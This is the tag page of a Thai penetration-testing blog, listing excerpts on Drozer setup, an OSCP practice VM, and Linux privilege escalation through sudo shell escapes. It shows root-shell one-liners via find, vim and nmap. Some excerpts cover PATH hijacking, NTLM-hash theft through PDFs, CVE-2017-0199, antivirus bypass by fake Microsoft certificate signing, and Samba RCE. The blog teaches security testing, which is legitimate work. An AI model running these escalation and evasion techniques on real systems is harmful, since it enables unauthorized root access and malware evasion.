Posts by tag
exploit
Drozer เป็นเครื่องมือสำหรับการตรวจสอบความปลอดภัยของ Mobile Application โดยจะเป็นการตรวจสอบแบบ Dynamic Analysis ครับ โดยวิธีการติดตั้งมีดังนี้ 1. Download deb และ whl จาก https://github.com/mwrlabs/drozer/releases 2. ติดตั้ง Required Package
3. ติตตั้ง Drozer App
4. สร้าง agent app
…
|
1 |
apt-get install python-protobuf |
|
1 2 |
dpkg -i drozer_2.4.4.deb pip install drozer-2.4.4-py2-none-any.whl |
|
1 |
drozer agent build |
วันนี้ผมเองเพิ่งจะมานั่ง clear tab (ซึ่ง ณ ตอนที่เขียนก็มีจำนวนตามภาพด้านล่าง) ที่เปิดค้างไว้ แล้วทีนี้เจอว่าเปิด post สำหรับ VM ที่มีช่องโหว่ที่แนะนำให้โหลดมาฝึกเล่นก่อนที่จะสอบ OSCP ก็เลยจับ Kiotrix ที่อยู่บนสุดของ List มาเล่นหน่อยละกัน Kioptrix เป็น VM ที่มีช่องโหว่สารพัดให้เราฝึกกัน โดยมันจะมีหลายๆ level ด้วยกัน ซึ่งจริงๆแล้วมันมีคนเคยเขียน blog มาหลายๆ blog แล้ว…
พอดีผมไปเจอ blog สำหรับการให้ได้มา shell ที่เป็นสิทธิ์ root ผ่าน command ต่างๆกัน โดยสามารถทำได้ผ่านสารพัดคำสั่งดังนี้ (อธิบายเรื่อง su และ sudo)
1. Find command
2. vim command
3. Nmap command
4. Man command…
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
/usr/bin/find /bin/echo /usr/bin/nmap /usr/bin/vim /usr/bin/nano /usr/bin/man /usr/bin/awk /usr/bin/less /usr/bin/ftp /usr/sbin/apache2 /usr/bin/wget /usr/sbin/tcpdump /usr/bin/strace /bin/mount |
|
1 2 |
sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \; |
|
1 |
sudo vim -c '!sh' |
|
1 2 3 4 5 6 |
# Old version sudo nmap --interactive nmap> !sh sh-4.1# # New version echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse |
โพสต์นี้จะเป็นการเพิ่มสิทธิ์ของ user ใน Linux ผ่านการกำหนด PATH environment นะครับ โดย PATH environment จะเป็นตัวแปลที่เก็บตำแหน่งของคำสั่งใน Linux ไว้นั่นเอง ซึ่งแต่ละ user ก็จะมี PATH ที่แตกต่างกันไปครับ ทีนี้หากเราใช้คำสั่งเช่น ifconfig เวลาที่ Linux ทำงานคือ มันก็จะไปหา ifconfig ว่าอยู่ใน path ไหนใน PATH…
ก่อนหน้านี้เคยพูดถึงข่าวที่ทาง Checkpoint พบช่องโหวที่ทำให้ Hacker สามารถขโมย NTLMv2 hash ได้หาก user เปิด malicious pdf ซึ่งก็มีคนทำตัวสร้าง pdf นั้นขึ้นมา ก็เลยเอามาเล่นดูครับ
Checkpoint พบช่องโหว่ใน Windows PDF Viewer ใดๆ เมื่อเปิดไฟล์ PDF ตัว user จะสามารถถูกขโมย NTLM Hashes ได้ผ่านการอ้างอิง NFS ได้ PDF Background โดยปกติแล้ว PDF นั้นสามารถฝัง object ต่างๆไว้ในไฟล์ได้ (ซึ่ง Microsoft Office ต่างๆก็ไม่ต่างกัน) โดยภายใน PDF จะมี…
จริงๆต้องบอกว่า CVE-2017-0199 นั้นเก่าพอสมควรมากแล้ว โดย CVE-2017-0199 ถูก publish ตั้งแต่เดือนเมษายน 2017 ทีนี้ผมทำ tutorial นี้ขึ้นมาเพื่อทดสอบทำการโจมตี Post Exploitation ใน Course Basic Penetration Testing เผื่อใครสนใจก็ลองดูครับ 1. สร้าง base64 command ขึ้นมา ในที่นี้สร้างโดยใช้ Msfvenom ครับ (หากใครยังไม่ได้สร้าง base64…
ก่อนหน้านี้เมื่อวันที่ 30/09/2017 ที่ผ่านมา ในงาน Redpill2017 ผมในหัวข้อเรื่อง “Endpoint protection is not enough” ทีนี้หนึ่งในนั้นที่ทำให้เห็นคือการสร้าง fake certificate ของ Microsoft แล้ว sign ไปยัง exe ใดๆ ก็ทำให้สามารถ bypass Antivirus บางตัวได้ จากภาพจะเห็นว่าก่อน sign ตอนแรกมี Antivirus อยู่…
พบช่องโหว่ Remote Code Execution ใน SAMBA (ซึ่งเป็น File Server สำหรับการแชร์ไฟล์ต่างๆของ Linux) version ตั้งแต่ 3.5.0 เป็นต้นมา หากเป็น share drive แบบที่ผู้โจมตีสามารถเขียนไฟล์ได้ ก็จะสามารถยึดเครื่องได้ทันที ช่องโหว่นี้ถูกแจ้งโดย Volker Lendecke พบว่าหาก upload library ที่ฝัง code อันตรายไว้ใน path ที่สามารถเขียนได้…
Checkpoint พบช่องโหว่ใน Media Player ยอดนิยมต่างๆไม่ว่าจะเป็น VLC, Kodi (XBMC), Popcorn Time และ Stremio ในการอ่าน subtitle ทำให้ตกเป็นเหยื่อของแฮ็คเกอร์ได้หากไปโหลด subtitle จากแหล่งที่ไม่น่าเชื่อถือมา Subtitle ของหนังหรือรายการทีวีใดๆที่ถูกเขียนโดยใครก็ได้และปล่อยให้ download ในแหล่ง download subtitle ต่างๆ อาจกลายเป็นแหล่งการโจมตีของแฮ็คเกอร์ได้ เมื่อมีการพบว่า Application ที่เป็นตัวเล่นไฟล์ media ต่างๆ ไม่ว่าจะเป็น VLC, Kodi…
LINE@Techsuii.com
Recent Comments